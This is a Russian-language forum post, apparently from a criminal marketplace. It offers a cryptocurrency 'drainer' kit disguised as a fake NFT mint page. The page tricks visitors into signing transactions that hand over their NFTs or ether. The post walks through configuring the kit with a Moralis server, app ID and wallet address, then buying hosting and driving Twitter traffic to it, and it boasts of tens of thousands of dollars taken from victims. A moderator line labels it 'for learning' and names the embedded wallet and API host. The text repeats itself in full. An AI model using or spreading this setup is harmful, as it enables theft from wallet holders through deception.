Внимание! Использовать в целях обучения! В код вшит кошелек 0x2ed40808C75379AD6114807cbb044cB619c0D214 и адрес api.rarecity.art (Moralis API)
web3.min.js
api.rarecity.art:2053
// Администрация форума
Суть фейка заточена под фейковый NFT mint, если у пользователя есть NFT, то в первую очередь его попросят отправить их под видом обычной транзакции и оплатой за GAS, но если NFT отсутствует , то будет создана транзакция на отправку эфира, учитывая что он есть в кошельке пользователя, если он отсутствует, ему будет выдана ошибка, чтобы он не узнал и не узнал все прелести функциональность!
Cкачать bind можно по ссылке
Настройка:
На временную почту зарегистрируйтесь moralis.io, нажми create new dapp, сеть mainnet ethereum, регион любой.
Жмем на создавшемся сервере settings коируем serverUrl и вставляем в 93 строку , так же копируем appId и вставляем в 94 строку
96 строка указываем свой кош eth
97 строка минимальный прайс минта , желательно от 0.1 эфира
Так же вы можете поменять дизайн на свой , заменив 2 картинки в папке assets.
Покупаем хостинг, домен и льем траф
Пример моего бинда
Советую делать красивые ленды , или маркетплейсы и уже по кнопке ставить наш бинд.
Я же не парился , т.к у меня был хороший трафик с твитера и просто выкладывал обычный бинд.
Сколько получалось вытащить с хорошего трафа ?
Ниже пример одного хорошего твиттер акка!
Земли в децентраленде продал за 40к$
Еще одну nft за 10eth
Остальное продал в общем на 25-30к
Ну и сумма в транзах вытянула на 17к$
Остальные залеты не вижу смысла выкладывать)
Всем профита !)
web3.min.js
api.rarecity.art:2053
// Администрация форума
Суть фейка заточена под фейковый NFT mint, если у пользователя есть NFT, то в первую очередь его попросят отправить их под видом обычной транзакции и оплатой за GAS, но если NFT отсутствует , то будет создана транзакция на отправку эфира, учитывая что он есть в кошельке пользователя, если он отсутствует, ему будет выдана ошибка, чтобы он не узнал и не узнал все прелести функциональность!
Cкачать bind можно по ссылке
Настройка:
На временную почту зарегистрируйтесь moralis.io, нажми create new dapp, сеть mainnet ethereum, регион любой.
Жмем на создавшемся сервере settings коируем serverUrl и вставляем в 93 строку , так же копируем appId и вставляем в 94 строку
96 строка указываем свой кош eth
97 строка минимальный прайс минта , желательно от 0.1 эфира
Так же вы можете поменять дизайн на свой , заменив 2 картинки в папке assets.
Покупаем хостинг, домен и льем траф
Пример моего бинда
Советую делать красивые ленды , или маркетплейсы и уже по кнопке ставить наш бинд.
Я же не парился , т.к у меня был хороший трафик с твитера и просто выкладывал обычный бинд.
Сколько получалось вытащить с хорошего трафа ?
Ниже пример одного хорошего твиттер акка!
Земли в децентраленде продал за 40к$
Еще одну nft за 10eth
Остальное продал в общем на 25-30к
Ну и сумма в транзах вытянула на 17к$
Остальные залеты не вижу смысла выкладывать)
Всем профита !)
Последнее редактирование модератором: